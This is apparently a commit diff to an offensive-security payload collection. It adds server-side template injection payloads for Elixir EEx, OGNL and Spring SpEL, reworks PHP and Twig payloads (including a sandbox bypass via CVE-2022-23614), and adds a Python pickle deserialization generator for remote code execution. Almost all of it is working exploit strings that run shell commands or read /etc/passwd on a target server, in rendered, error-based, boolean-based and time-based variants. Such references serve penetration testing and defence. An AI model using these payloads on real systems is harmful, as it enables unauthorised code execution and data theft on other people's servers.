SSTI:

- Added Elixir/EEx payloads - Added OGNL payloads - Clarified SpEL payloads and details - Fixed PHP Error-Based payloads - Added Twig Error-Based payload for CVE-2022-23614 Insecure Deserialization: - Improved Python payloads
2026-03-12 21:22:59 -07:00 · 2026-02-22 21:18:54 +03:00
parent 10d41d2e7d
commit dac581547e
4 changed files with 160 additions and 4 deletions
--- a/Deserialization/Python.md
+++ b/Deserialization/Python.md
@@ -68,6 +68,30 @@ evil_token = b64encode(cPickle.dumps(e))
 print("Your Evil Token : {}").format(evil_token)
 ```

+This payload uses platform-specific `os` module, so payloads generated on Windows will not work on Linux and vice versa.
+
+A universal payload can be created by loading `os` at runtime using eval:
+
+```python
+import pickle
+import base64
+
+class RCE:
+    def __reduce__(self):
+        return eval, ("__import__('os').system('whoami')",)
+pickled = pickle.dumps(RCE())
+print(base64.b64encode(pickled).decode())
+```
+
+This approach allows running arbitrary python code, which allows us to use different techniques from code injection:
+
+```python
+__import__('os').system('whoami') # Reflected RCE
+getattr('', __import__('os').popen('whoami').read()) # Error-Based RCE
+1 / (__include__("os").popen("id")._proc.wait() == 0) # Boolean-Based RCE
+__include__("os").popen("id && sleep 5").read() # Time-Based RCE
+```
+
 ### PyYAML

 YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures.
@@ -111,3 +135,4 @@ with open('exploit_unsafeloader.yml') as file:
 * [Python Yaml Deserialization - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization)
 * [PyYAML Documentation - PyYAML - April 29, 2006](https://pyyaml.org/wiki/PyYAMLDocumentation)
 * [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
+* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
--- a/Injection/Elixir.md
+++ b/Injection/Elixir.md
@@ -0,0 +1,66 @@
+# Server Side Template Injection - Elixir
+
+> Server-Side Template Injection (SSTI)  is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation.
+
+## Summary
+
+- [Templating Libraries](#templating-libraries)
+- [Universal Payloads](#universal-payloads)
+- [EEx](#eex)
+    - [EEx - Basic injections](#eex---basic-injections)
+    - [EEx - Retrieve /etc/passwd](#eex---retrieve-etcpasswd)
+    - [EEx - Remote Command execution](#eex---remote-command-execution)
+- [References](#references)
+
+## Templating Libraries
+
+| Template Name | Payload Format |
+|---------------|----------------|
+| EEx           | `<%= %>`       |
+| LEEx          | `<%= %>`       |
+| HEEx          | `<%= %>`       |
+
+## Universal Payloads
+
+Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx.
+
+By default, only EEx can render templates from string, but it is possible to use LEEx and HEEx as replacement engines for EEx.
+
+To use these payloads, wrap them in the appropriate tag.
+
+```erlang
+elem(System.shell("id"), 0) # Rendered RCE
+[1, 2][elem(System.shell("id"), 0)] # Error-Based RCE
+1/((elem(System.shell("id"), 1) == 0)&&1||0) # Boolean-Based RCE
+elem(System.shell("id && sleep 5"), 0) # Time-Based RCE
+```
+
+## EEx
+
+[Official website](https://hexdocs.pm/eex/1.19.5/EEx.html)
+> EEx stands for Embedded Elixir.
+
+### EEx - Basic injections
+
+```erlang
+<%= 7 * 7 %>
+```
+
+### EEx - Retrieve /etc/passwd
+
+```erlang
+<%= File.read!("/etc/passwd") %>
+```
+
+### EEx - Remote Command execution
+
+```erlang
+<%= elem(System.shell("id"), 0) %> # Rendered RCE
+<%= [1, 2][elem(System.shell("id"), 0)] %> # Error-Based RCE
+<%= 1/((elem(System.shell("id"), 1) == 0)&&1||0) %> # Boolean-Based RCE
+<%= elem(System.shell("id && sleep 5"), 0) %> # Time-Based RCE
+```
+
+## References
+
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
--- a/Injection/Java.md
+++ b/Injection/Java.md
@@ -35,6 +35,9 @@
    - [SpEL - DNS Exfiltration](#spel---dns-exfiltration)
    - [SpEL - Session Attributes](#spel---session-attributes)
    - [SpEL - Command Execution](#spel---command-execution)
+- [Object-Graph Navigation Language](#object-graph-navigation-language)
+    - [OGNL - Basic Injection](#ognl---basic-injection)
+    - [OGNL - Command Execution](#ognl---command-execution)
 - [References](#references)

 ## Templating Libraries
@@ -46,7 +49,7 @@
 | Groovy        | `${ }`                 |
 | Jinjava       | `{{ }}`                |
 | Pebble        | `{{ }}`                |
-| Spring        | `*{ }`                 |
+| SpEL          | `*{ }`, `#{ }`, `${ }` |
 | Thymeleaf     | `[[ ]]`                |
 | Velocity      | `#set($X="") $X`       |

@@ -367,9 +370,12 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val

 ### SpEL - Basic Injection

+> SpEL has built-in templating system using #{ }, but SpEL is also commonly used for interpolation using ${ }
+
 ```java
 ${7*7}
 ${'patt'.toString().replace('a', 'x')}
+${T(java.lang.Integer).valueOf('1')}
 ```

 ### SpEL - Retrieve Environment Variables
@@ -440,6 +446,65 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
    ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
    ${request.getAttribute("a")}
    ```
+- Error-Based payload:
+  
+    ```java
+    ${T(java.lang.Integer).valueOf("x"+T(java.lang.String).getConstructor(T(byte[])).newInstance(T(java.lang.Runtime).getRuntime().exec("id").inputStream.readAllBytes()))}
+    ```
+  
+- Boolean-Based payload:
+  
+    ```java
+    ${1/((T(java.lang.Runtime).getRuntime().exec("id").waitFor()==0)?1:0)+""}
+    ```
+  
+- Time-Based payload:
+  
+    ```java
+    ${(T(java.lang.Runtime).getRuntime().exec("id").waitFor().equals(0)?T(java.lang.Thread).sleep(5000):0).toString()}
+    ```
+
+## Object-Graph Navigation Language
+
+[Official website](https://commons.apache.org/dormant/commons-ognl/)
+
+> OGNL stands for Object-Graph Navigation Language; it is an expression language for getting and setting properties of Java objects, plus other extras such as list projection and selection and lambda expressions. You use the same expression for both getting and setting the value of a property.
+
+### OGNL - Basic Injection
+
+> OGNL can be used with different tags like ${ }
+
+```java
+7*7
+'patt'.toString().replace('a', 'x')
+@java.lang.Integer@valueOf('1')
+```
+
+### OGNL - Command Execution
+
+Rendered:
+
+```java
+new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes())
+```
+
+Error-Based:
+
+```java
+(new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes()))/0
+```
+
+Boolean-Based:
+
+```java
+1/((@java.lang.Runtime@getRuntime().exec("id").waitFor()==0)?1:0)+""
+```
+
+Time-Based:
+
+```java
+((@java.lang.Runtime@getRuntime().exec("id").waitFor().equals(0))?@java.lang.Thread@sleep(5000):0)
+```

 ## References

--- a/Injection/PHP.md
+++ b/Injection/PHP.md
@@ -47,9 +47,7 @@ system('id')

 // Error-Based RCE
 ini_set("error_reporting", "1") // Enable verbose fatal errors for Error-Based
-fopen(join("", ["Y:/A:/", shell_exec('id')]), "r")
-include(join("", ["Y:/A:/", shell_exec('id')]))
-join("", ["xx", shell_exec('id')])()
+call_user_func(join("", ["xx", shell_exec('id')]))

 // Boolean-Based RCE
 1 / (pclose(popen("id", "wb")) == 0)
@@ -163,6 +161,8 @@ $output = $twig > render (

 {{_self.env.registerUndefinedFilterCallback("shell_exec")}}{{1/(_self.env.getFilter("id && echo UniqueString")|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE <= 1.19
 {{1/({"id && echo UniqueString":"shell_exec"}|map("call_user_func")|join|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE >=1.41, >=2.10, >=3.0
+
+{% set a = ["error_reporting", "1"]|sort("ini_set") %}{% set b = ["ob_start", "call_user_func"]|sort("call_user_func") %}{{ ["id", 0]|sort("system") }}{% set a = ["ob_end_flush", []]|sort("call_user_func_array")%} // Error-Based RCE with sandbox bypass using CVE-2022-23614
 {{ 1 / (["id >>/dev/null && echo -n 1", "0"]|sort("system")|first == "0") }} // Boolean-Based RCE with sandbox bypass using CVE-2022-23614
 ```